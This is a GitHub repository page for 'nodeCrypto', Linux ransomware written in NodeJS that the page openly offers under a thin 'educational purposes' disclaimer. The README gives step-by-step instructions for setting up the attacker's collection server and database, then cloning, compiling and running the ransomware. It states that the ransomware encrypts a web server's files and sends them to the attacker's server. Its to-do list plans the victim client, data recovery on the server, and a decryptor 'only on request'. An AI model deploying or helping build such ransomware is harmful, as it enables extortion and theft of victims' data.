Skip to content

nodeCrypt is a linux Ransomware written in NodeJs that encrypt predefined files. This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto.

Notifications You must be signed in to change notification settings

nerodtm/nodeCrypto-v2.0---Ransomware-Written-In-NodeJs

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 
 
 

Repository files navigation

nodeCrypto logo


What is nodeCrypto?

nodeCrypt is a linux Ransomware written in NodeJs that encrypt predefined files.
This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto.

Demo video

Demo video

Install server

Upload all file of server/ folder on your webserver.
Create a sql database and import sql/nodeCrypto.sql
Edit server/libs/db.php and add your SQL ID.

Install and run

git clone https://github.com/atmoner/nodeCrypto.git
cd nodeCrypto && npm install
cd sources && npm install
cd .. && npm start

Once your configuration is complete, run compile!
You can start the ransomware.

cd sources && ./output

The files at the root of the web server will encrypt and send to the server.

Screenshot

Compil Infection Infection

To Do

  • GUI exe creator
    • Edit basic variable
    • Export cross-plateform
  • Client (victim)
    • Encrypt webserver
    • Use private key for encryption
    • Adapt SSL
  • Server
    • Recover data (user + encrypted file)
    • Format the database
    • Make GUI for webserver
  • Make an executable to decrypt the files (Only on request! Contact me)

About

nodeCrypt is a linux Ransomware written in NodeJs that encrypt predefined files. This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published